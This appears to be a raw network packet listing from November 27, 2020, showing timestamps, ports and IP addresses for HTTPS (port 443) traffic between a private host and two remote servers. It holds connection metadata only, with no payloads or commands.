Nov 27, 2020 18:44:31.566174984 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566243887 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566628933 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566675901 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566713095 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566740990 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566781044 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566817045 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566854954 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.566881895 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.567147970 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.567162991 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.567331076 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.567374945 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.567461014 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.567620993 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.657370090 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.657502890 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.663355112 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.663366079 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.663609028 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.781404972 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.781447887 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.781475067 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.781500101 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.781549931 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.781753063 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.783024073 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.783032894 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.783308029 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.786840916 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.786868095 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.787028074 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.787108898 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.787360907 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.787517071 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.795747995 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.919187069 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.946316957 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:33.718556881 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:33.718710899 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:33.720308065 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:33.844490051 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:33.844700098 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:33.882621050 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:34.010041952 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:34.010071039 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:34.010246038 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:34.220382929 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:34.221071959 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:34.344455004 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:34.344587088 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:34.384315968 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.054871082 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.054941893 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.054970026 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.054989100 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.055008888 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.055027962 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.055027962 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.055044889 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.055063009 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.055072069 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.055078983 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.055080891 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.055083036 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.055088043 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.055119991 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.055156946 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.059077024 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.059727907 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.060822964 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.060985088 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.178754091 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.178812981 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.178858995 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.178855896 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.178904057 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.178905964 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.178914070 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.178967953 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.182593107 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183096886 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183432102 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183485031 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183522940 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183533907 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183541059 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183583021 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183584929 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183595896 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183631897 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183649063 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183677912 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183693886 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183722973 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183737040 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183774948 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183783054 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183825016 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183837891 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183873892 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183888912 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183923006 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183928967 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.183970928 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.183978081 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.184015036 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.184035063 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.184061050 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.184075117 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.184129953 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.184374094 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.184731007 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.185033083 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302530050 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.302582026 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.302630901 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302659035 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.302711010 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302728891 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302751064 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.302817106 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302819967 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.302884102 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302890062 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.302948952 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.302956104 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.303021908 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.303021908 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.303091049 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.307708025 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.307748079 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.307830095 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.308105946 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.308192968 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.308218956 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.308487892 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.308564901 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.308851004 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.308916092 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.308937073 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.308969975 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.308998108 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309010983 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309027910 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309052944 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309062958 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309083939 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309094906 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309096098 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309118032 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309125900 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309151888 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309156895 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309179068 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309185028 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:35.309225082 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.309237003 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.924710035 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.949073076 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.949279070 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:35.983613014 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.006134033 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.006294966 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.009363890 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.031806946 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.037079096 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.037096024 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.037250042 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.037300110 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.049175978 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049212933 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049236059 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049259901 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049283028 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049304008 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049326897 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049329042 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.049349070 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049365997 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.049376965 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049410105 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.049422026 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.049422026 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.049453020 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.049474955 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.051271915 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.072673082 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.072937965 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.073673010 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.073966980 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.073990107 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.074074030 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.074121952 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.076329947 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.076395035 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.076745033 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.076859951 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.080368996 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.098805904 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.098825932 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.099224091 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.099244118 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.100323915 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.100342989 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.100461960 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.100512981 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.114279985 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.143691063 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.172910929 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.172957897 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.172998905 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173037052 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173078060 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173118114 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173161983 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173166990 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173213005 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173252106 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173293114 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173294067 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173300982 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173305988 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173310995 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173315048 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173319101 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173322916 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173326969 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173360109 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173418045 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173437119 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173450947 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173491001 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173496962 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173531055 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173535109 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173563004 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173568964 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173584938 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173608065 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173629045 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173655033 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173666954 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173697948 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173712969 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173736095 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.173752069 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.173791885 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.196538925 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.196609974 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.196666002 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.196711063 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297303915 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297358990 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297422886 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297466040 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297492027 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297503948 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297537088 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297554016 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297564983 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297605991 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297610998 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297646046 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297669888 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297693968 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297719955 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297738075 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297755003 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297775984 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297799110 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297815084 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297853947 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297854900 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297869921 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297893047 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297914982 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297930956 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297952890 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.297970057 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.297992945 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298017025 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298033953 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298058987 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298077106 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298098087 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298119068 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298136950 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298161030 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298177958 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298197985 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298217058 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298238993 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298254967 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298274994 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298294067 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298314095 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298341036 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298352957 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298386097 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298402071 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298423052 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298441887 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298461914 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298485041 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298502922 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298521042 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298541069 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298563957 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298578978 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298603058 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298619032 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298639059 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298669100 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298681974 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298712969 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298727989 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298752069 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298777103 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298790932 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298813105 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298830032 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298851967 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298866987 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298890114 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298906088 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298928976 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.298943996 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.298969984 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.299005032 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.320394993 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.320457935 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.320494890 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.320545912 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.320622921 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.320662022 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.320667028 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.422761917 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.422825098 CET	443	49724	170.10.160.34	192.168.2.4
